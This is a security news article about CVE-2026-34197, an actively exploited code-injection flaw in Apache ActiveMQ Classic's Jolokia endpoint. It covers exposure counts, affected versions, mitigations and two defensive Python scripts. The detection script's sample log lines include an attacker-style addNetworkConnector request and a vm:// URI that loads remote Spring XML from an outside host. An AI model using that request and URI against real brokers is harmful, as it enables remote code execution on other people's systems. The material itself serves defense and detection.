6,000+ Apache ActiveMQ instances vulnerable to CVE-2026-34197 remain exposed online
More than 6,000 internet-exposed Apache ActiveMQ systems still appear vulnerable to CVE-2026-34197, a newly exploited flaw that CISA has now added to its Known Exploited Vulnerabilities catalog. Shadowserver said it saw 6,364 vulnerable IPs on April 19, 2026 based on version checks, and the organization has started daily internet scans for the issue.
The risk is serious because this is not just another newly disclosed bug. Apache says CVE-2026-34197 is an improper input validation and code injection vulnerability in ActiveMQ Classic, while CISA’s KEV listing means the U.S. agency has evidence of active exploitation in the wild.
Apache ActiveMQ is widely used as a message broker in enterprise software and internal application environments. That gives exposed management interfaces extra value to attackers, who can use a messaging server foothold to disrupt services, pivot deeper into connected systems, or run code on the broker itself.
What CVE-2026-34197 does
Apache’s advisory says the flaw affects the Jolokia JMX-HTTP bridge exposed at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on ActiveMQ MBeans, including broker functions that can be abused to load a remote Spring XML application context.
Apache says an authenticated attacker can trigger the vulnerable path with a crafted discovery URI. Because Spring instantiates singleton beans before the broker validates the configuration, arbitrary code execution can occur on the broker’s JVM through methods such as Runtime.exec().
The vulnerability affects Apache ActiveMQ Broker before 5.19.4, and the 6.x line from 6.0.0 up to but not including 6.2.3. Apache’s advisory recommends upgrading to version 5.19.4 or 6.2.3.
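The version ranges above are what a scanner such as Shadowserver's has to test. The following is an added example (not Apache's or Shadowserver's code) that classifies a version banner against those ranges and treats an unparsable banner as unknown rather than safe; the banners and TEST-NET addresses are constructed.

```python
import re

# First fixed release per major line, from Apache's advisory for CVE-2026-34197.
FIXED = {5: (5, 19, 4), 6: (6, 2, 3)}

def parse_version(text):
    """Extract x.y.z from a banner such as 'Apache ActiveMQ/5.18.3'; None if absent."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", text)
    return tuple(int(g) for g in m.groups()) if m else None

def is_affected(text):
    """True = in an affected range, False = fixed or outside the listed ranges,
    None = version could not be parsed (treat as unknown, never as safe)."""
    v = parse_version(text)
    if v is None:
        return None
    if v[0] <= 5:            # anything before 5.19.4, including older major lines
        return v < FIXED[5]
    if v[0] == 6:            # 6.0.0 up to but not including 6.2.3
        return v < FIXED[6]
    return False             # 7.x or later is not in the advisory's ranges

def triage(banners):
    """Bucket (host, banner) pairs into affected / fixed / unknown host lists."""
    buckets = {"affected": [], "fixed": [], "unknown": []}
    for host, banner in banners:
        state = is_affected(banner)
        key = "unknown" if state is None else ("affected" if state else "fixed")
        buckets[key].append(host)
    return buckets

# Constructed banners (not Shadowserver data); hosts are TEST-NET addresses.
SAMPLE_BANNERS = [
    ("192.0.2.10", "Apache ActiveMQ/5.18.3"),
    ("192.0.2.11", "Apache ActiveMQ/5.19.4"),
    ("192.0.2.12", "Apache ActiveMQ/6.1.1"),
    ("192.0.2.13", "Apache ActiveMQ/6.2.3"),
    ("192.0.2.14", "Apache ActiveMQ"),          # no version in the banner
]

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_BANNERS).items():
        print(f"{bucket}: {hosts}")
```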
Why the exposure is more urgent now
CISA’s KEV entry adds a federal remediation deadline of April 30, 2026. NVD shows CISA added the flaw to the KEV catalog on April 16 and listed the required action as applying vendor mitigations, following BOD 22-01 guidance for cloud services, or discontinuing use if mitigations are unavailable.
That makes the Shadowserver count more important. A few exposed systems would already matter for a bug under active exploitation, but more than 6,300 exposed IPs suggest a broad attack surface that defenders can measure in real time. Shadowserver said it is now scanning daily and sharing affected IP data through its Accessible ActiveMQ reporting service.
There is another complication. Horizon3.ai said the flaw normally requires credentials, but default credentials such as admin:admin remain common. On ActiveMQ Classic versions 6.0.0 through 6.1.1, Horizon3.ai also says CVE-2026-34197 can become effectively unauthenticated when chained with CVE-2024-32114, which exposes the Jolokia API without authentication.
At a glance
| Item | Detail |
|---|---|
| CVE | CVE-2026-34197 |
| Product | Apache ActiveMQ Classic |
| Vulnerability type | Improper input validation and code injection |
| Impact | Arbitrary code execution on the broker JVM |
| Affected versions | Before 5.19.4, and 6.0.0 before 6.2.3 |
| Fixed versions | 5.19.4 and 6.2.3 |
| KEV due date | April 30, 2026 |
| Exposed systems seen by Shadowserver | 6,364 IPs on April 19, 2026 |
What defenders should do now
Organizations running Apache ActiveMQ should first identify any internet-facing web consoles and Jolokia endpoints. Apache’s own guidance is clear that affected systems should move to fixed releases, and CISA’s KEV action language makes patching and mitigation urgent.
Security teams should also reduce exposure, not just upgrade. If the management console does not need to be public, it should sit behind access controls or a VPN, and defenders should review authentication settings closely because weak or default credentials can sharply lower the bar for exploitation. That recommendation follows from Apache’s description of the attack path and Horizon3.ai’s warning about default credentials.
Monitoring matters here too. Help Net Security’s April 21 update says defenders should look for requests to /api/jolokia/ containing addNetworkConnector, outbound HTTP requests from the ActiveMQ process to unexpected hosts, suspicious vm:// URIs with brokerConfig=xbean:http, and unexpected child processes spawned by the Java process.
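The four indicators in that update can be turned into simple log rules. The block below is an added example (not Help Net Security's or Apache's code) that runs them over constructed telemetry lines; the allowlist of expected hosts, the `<broker-mbean>` placeholder and the log formats are assumptions for illustration.

```python
import re
from urllib.parse import unquote

# Hosts the broker is expected to reach over HTTP (constructed allowlist).
EXPECTED_HOSTS = {"10.0.0.20", "10.0.0.21"}

def url_decode(line):
    # Jolokia arguments travel URL-encoded, sometimes twice; decode until stable.
    prev = None
    while prev != line:
        prev, line = line, unquote(line)
    return line

def jolokia_add_network_connector(line):
    return bool(re.search(r"/api/jolokia/.*addNetworkConnector", line, re.I))

def remote_xbean_config(line):
    return bool(re.search(r"vm://\S*brokerConfig=xbean:https?://", line, re.I))

def java_spawned_child(line):
    return bool(re.search(r"parent=java\b.*child=(sh|bash|cmd\.exe|powershell)", line, re.I))

def unexpected_outbound_http(line):
    m = re.search(r"process=java\b.*dst=([\w.-]+):(80|443|8080)\b", line)
    return bool(m) and m.group(1) not in EXPECTED_HOSTS

RULES = [
    ("jolokia_addNetworkConnector", jolokia_add_network_connector),
    ("remote_xbean_broker_config", remote_xbean_config),
    ("unexpected_outbound_http", unexpected_outbound_http),
    ("java_spawned_child_process", java_spawned_child),
]

def scan(lines):
    """Return (line_number, rule_name) for every indicator that fires."""
    hits = []
    for n, raw in enumerate(lines, 1):
        line = url_decode(raw)
        hits.extend((n, name) for name, check in RULES if check(line))
    return hits

# Constructed sample telemetry (not real logs): a benign Jolokia read with an
# URL-encoded MBean, then one line per indicator from the paragraph above.
SAMPLE_LINES = [
    '10.0.0.5 - admin "GET /api/jolokia/read/org.apache.activemq%3Atype%3DBroker%2CbrokerName%3Dlocalhost/TotalMessageCount HTTP/1.1" 200',
    '203.0.113.9 - admin "POST /api/jolokia/ HTTP/1.1" 200 body={"type":"exec","mbean":"<broker-mbean>","operation":"addNetworkConnector"}',
    'activemq.log WARN | Could not start network connector vm://localhost?brokerConfig=xbean:http://203.0.113.9/ctx.xml',
    'conn_event host=mq01 process=java dst=203.0.113.9:80 proto=http',
    'process_event host=mq01 parent=java pid=4242 child=sh',
]
```

Running `scan(SAMPLE_LINES)` flags lines 2 to 5 and leaves the benign read on line 1 alone.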
Recommended actions
- Upgrade Apache ActiveMQ Classic to 5.19.4 or 6.2.3.
- Inventory any externally reachable ActiveMQ web consoles and Jolokia endpoints.
- Restrict management access to trusted networks or VPN-only paths.
- Check for default or weak credentials on exposed systems.
- Review logs and telemetry for suspicious Jolokia API calls and unexpected outbound connections from the broker.
FAQ
Yes. CISA added it to the Known Exploited Vulnerabilities catalog, which indicates evidence of active exploitation.
Not always in practice. Apache describes the core flaw as authenticated, but Horizon3.ai says some versions can become effectively unauthenticated when chained with CVE-2024-32114.
The flaw affects Apache ActiveMQ Classic, not Artemis. Horizon3.ai explicitly says the issue affects Classic only.
It gives defenders a real-world view of how many vulnerable systems remain exposed online. Shadowserver reported 6,364 vulnerable IPs seen on April 19, 2026 and said it is scanning daily.